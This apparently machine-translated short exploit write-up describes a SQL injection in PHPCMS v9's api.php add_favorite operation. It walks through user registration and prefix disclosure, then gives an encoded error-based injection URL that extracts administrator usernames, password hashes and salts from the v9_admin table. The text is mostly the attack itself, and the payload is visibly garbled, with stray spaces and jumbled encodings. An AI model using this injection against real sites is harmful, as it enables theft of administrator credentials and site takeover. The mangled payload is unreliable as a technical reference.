The cause of the vulnerability is not too much. If you are interested in phpcms/api. php files, you can dig more phpcms holes.
Main utilization process:
Step 1: register a user
Http://www.wooyun.in/index.php? M = member & c = index & a = register & siteid = 1
Step 2: Access the api file and expose the table prefix. The default table prefix is v9.
Http://www.wooyun.in/api.php? Op = add_favorite & url = wooyun. in & title = % 2527
Step 3: pop up the user password (the red font below is the table prefix to be modified)
Http://www.wooyun.in/api.php? Op = add_favorite & url = v9 & title = % 2527% 2520and % 2520% 2528 select % 25201% 2520 from % 2528 select % 2520 count % 2528% 252a % 2529% Cconcat % 252 2528% select % 2528 2528 select % 2520% 2528 select % 2520 concat % 25280 x 23% 252 Ccast % 2528 concat % 2528 username % 252C0x3a % 252 Cpassword % 252C0x3a % 252 Cencrypt % 2529% 2520as % 2520 char % 2529% 252C0x23% 2529% 2520 from % 2520v9_admin % 2520 LIMIT % 25200% 252C1% 2529% 2529% from % 2520information_schema.tables % 2520 limit % 2520 252C1% 25200% Cfloor % 2529% rand % 252 252a2% 2528 2529x % 2520 from % 2520information_schema.tables % 2520 group % 2520by % 2520x % 2529a % 2529% 2520and % 2520% 25271% 2527% 253D % 25271
Address: http://www.wooyun.in/post/14.html
Www.2cto.com